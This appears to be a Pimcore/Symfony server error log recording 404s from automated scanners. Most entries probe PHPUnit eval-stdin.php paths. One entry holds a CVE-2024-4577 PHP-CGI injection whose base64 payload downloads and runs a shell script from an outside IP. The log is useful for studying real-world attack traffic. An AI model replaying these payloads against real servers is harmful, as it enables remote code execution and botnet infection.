[2025-04-22T13:13:01.418887+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/webui/"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/webui/\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /webui/ HTTP/1.1\r\nAccept:          */*\r\nAccept-Encoding: gzip\r\nHost:            35.219.88.188\r\nUser-Agent:      Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0\r\nX-Php-Ob-Level:  1\r\n\r\n at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T13:15:19.026258+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/geoserver/web/"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/geoserver/web/\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /geoserver/web/ HTTP/1.1\r\nAccept:          */*\r\nAccept-Encoding: gzip\r\nHost:            35.219.88.188\r\nUser-Agent:      Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Iron Safari/537.36\r\nX-Php-Ob-Level:  1\r\n\r\n at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:11.228360+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST http://35.219.88.188/hello.world"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST http://35.219.88.188/hello.world\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nPOST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            221\r\nContent-Type:              application/x-www-form-urlencoded\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php shell_exec(base64_decode(\"WD0kKGN1cmwgaHR0cDovLzEwNy4xNTAuMC4xMDMvc2ggfHwgd2dldCBodHRwOi8vMTA3LjE1MC4wLjEwMy9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA=\")); echo(md5(\"Hello CVE-2024-4577\")); ?> at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:11.619928+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:11.765407+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:11.906725+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/vendor/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/vendor/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:12.044888+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/vendor/phpunit/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/vendor/phpunit/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:12.192098+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/vendor/phpunit/phpunit/LICENSE/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/vendor/phpunit/phpunit/LICENSE/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:12.337861+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:12.475531+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:12.614243+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/phpunit/phpunit/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/phpunit/phpunit/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:12.759510+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:12.893944+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/phpunit/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/phpunit/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:13.028096+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:13.172899+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/lib/phpunit/phpunit/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/lib/phpunit/phpunit/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:13.310623+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/lib/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/lib/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:13.443160+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/lib/phpunit/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/lib/phpunit/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:13.576354+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:13.710562+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:13.841962+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:13.977490+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:14.120472+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:14.265371+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:14.402577+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:14.560054+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:14.698495+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php 